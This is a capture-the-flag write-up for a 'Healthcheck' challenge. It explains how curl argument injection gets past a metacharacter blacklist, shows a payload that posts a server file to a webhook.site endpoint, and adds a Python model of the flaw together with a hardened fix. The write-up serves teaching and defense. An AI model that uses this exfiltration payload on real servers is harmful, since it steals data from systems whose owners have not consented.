Healthcheck
We were given a suspiciously wholesome-looking page at:
http://104.214.185.119/index.php

It's titled "Health Check Your Webpage", but deep down we all knew this wasn't about HTTP wellness. Our job? Dig up something the dev left behind: their "hopes and dreams" (literally; the page says "I left my hopes_and_dreams on the server.").
So, we open the given source code and what do we find? This:

Command injection vibes, since the URL we submit ends up inside a shell_exec() call. But wait, there's a blacklist:

No ;, &, |, or even $. Brutal. Like trying to eat soup with a fork. Chaining a second command is off the table, but note what is not blocked: spaces, dashes and @. Those are all you need to hand curl extra arguments of your own.
At first, we tried every command injection trick in the book:
· http://127.0.0.1/hopes_and_dreams
· http://104.214.185.119/index.php/hopes_and_dreams
· http://example.com http://127.0.0.1/hopes_and_dreams -o /var/www/html/hopes_and_dreams

But… nothing. It only gave back HTTP status codes like 200 or 301. No body content, no error output, just silence. Hmmm.
That's because the output of curl is redirected to /dev/null:

So the actual response body is thrown away; only the status code makes it back to us.
We stopped thinking like a hacker. We started thinking like a hacker with a network. If we can't see the flag directly… why not send it to ourselves?
We used Webhook.site, a free service that gives us a unique endpoint to collect requests.
Then, we crafted this payload:
We hit submit, went back to webhook.site, and there it was, sitting like a jewel in the logs:

That -o /dev/null part discards the body. So even if we could get the server to fetch or print the file, we'd never see its contents in the response.
But what if we told the vulnerable server to make its own HTTP request to somewhere we can monitor?
That's where webhook.site comes in: it's our external listener, a "data exfiltration endpoint".
By telling the target to run:
curl -X POST -d @hopes_and_dreams https://webhook.site/...
…curl reads the contents of the hopes_and_dreams file (the @ prefix means "read the data from this file", resolved relative to curl's working directory, which here is evidently where the file lives) and sends it as the POST request body to our webhook. Nothing shows up in the browser, but we don't need it: the data is sent to us. (-d already implies POST, so the -X POST is belt and braces.)
The whole thing works because the blacklist only stops shell chaining. It never stops us from appending more arguments to curl, so this is really an argument injection into curl rather than a full command injection, and no metacharacters are needed. One practical caveat: webhook.site is a public third-party service, so whatever you exfiltrate through it sits in their logs too. Fine for a CTF flag; on a real engagement, use a listener you control.
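To make the blacklist gap and the exfiltration concrete, here is an added example that is not from the original writeup or the challenge: a small Python model of the vulnerable health check (a blacklist of ; & | $ and a curl command built by string concatenation, which is the assumed shape of the challenge's shell_exec() call since the PHP source is not reproduced here). It shows that the `-d @hopes_and_dreams` payload sails past the blacklist, that the shell hands curl the extra flags as separate arguments, and which file curl would then read. A hardened version validates the URL and passes it to curl as a single argv element after `--`, so it can never turn into a flag. The webhook URL, the file contents and the PHP command shape are all constructed for the demo.

```python
import shlex
import tempfile
from pathlib import Path
from typing import List, Optional
from urllib.parse import urlparse

# Characters the challenge rejected, per the writeup. The real PHP check is
# not on the page, so this is an assumed equivalent.
BLACKLIST = set(";&|$")


def is_blocked(user_input: str) -> bool:
    """The writeup's blacklist: reject shell metacharacters, nothing else."""
    return any(c in BLACKLIST for c in user_input)


def vulnerable_command(user_input: str) -> str:
    """Assumed shape of the challenge's shell_exec() call: the user value is
    concatenated into a curl command whose body goes to /dev/null and whose
    only visible output is the status code from -w."""
    if is_blocked(user_input):
        raise ValueError("input rejected by blacklist")
    return f"curl -s -o /dev/null -w '%{{http_code}}' {user_input}"


def curl_argv(command: str) -> List[str]:
    """Split the command the way /bin/sh would hand argv to curl."""
    return shlex.split(command)


def posted_file(argv: List[str]) -> Optional[str]:
    """Return the path curl would read for '-d @<file>', or None.
    Only the '-d @file' form used in the writeup is modelled."""
    for i, arg in enumerate(argv):
        if arg in ("-d", "--data") and i + 1 < len(argv) and argv[i + 1].startswith("@"):
            return argv[i + 1][1:]
    return None


def exfiltrated_body(user_input: str, workdir: Path) -> Optional[str]:
    """Simulate the exfil: the file named after '-d @' is read relative to
    curl's working directory; its contents would become the POST body."""
    path = posted_file(curl_argv(vulnerable_command(user_input)))
    return (workdir / path).read_text() if path else None


def safe_argv(user_input: str) -> List[str]:
    """Hardened version: validate the URL, pass it as one argv element with
    no shell involved, and end option parsing with '--' so a value starting
    with '-' can never become a curl flag."""
    if not user_input or user_input.startswith("-") or any(c.isspace() for c in user_input):
        raise ValueError("invalid URL")
    parts = urlparse(user_input)
    if parts.scheme not in ("http", "https") or not parts.hostname:
        raise ValueError("invalid URL")
    return ["curl", "-s", "-o", "/dev/null", "-w", "%{http_code}", "--", user_input]


# Constructed payload with a placeholder webhook URL, not the author's real one.
PAYLOAD = ("http://example.com -X POST -d @hopes_and_dreams "
           "https://webhook.site/00000000-0000-0000-0000-000000000000")


def demo() -> Optional[str]:
    """Drop a constructed hopes_and_dreams file in a temp dir and show that the
    blacklist-passing payload makes curl read it."""
    with tempfile.TemporaryDirectory() as d:
        (Path(d) / "hopes_and_dreams").write_text("flag{constructed-sample}")
        return exfiltrated_body(PAYLOAD, Path(d))


if __name__ == "__main__":
    print("blacklisted?", is_blocked(PAYLOAD))
    print("argv seen by curl:", curl_argv(vulnerable_command(PAYLOAD)))
    print("body curl would POST:", demo())
    try:
        safe_argv(PAYLOAD)
    except ValueError as e:
        print("hardened build rejects payload:", e)
```

The hardened `safe_argv` is the fix a practitioner would actually ship: never build a shell string from user input, reject anything that is not a plain http(s) URL, and use `--` so curl stops reading options before the user-supplied value. Note that validating the URL also closes the SSRF side of this (health-checking 127.0.0.1 or internal hosts) only if you additionally restrict the allowed hosts, which this example deliberately does not attempt.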
Flag: umcs{n1c3_j0b_ste4l1ng_myh0p3_4nd_dr3ams}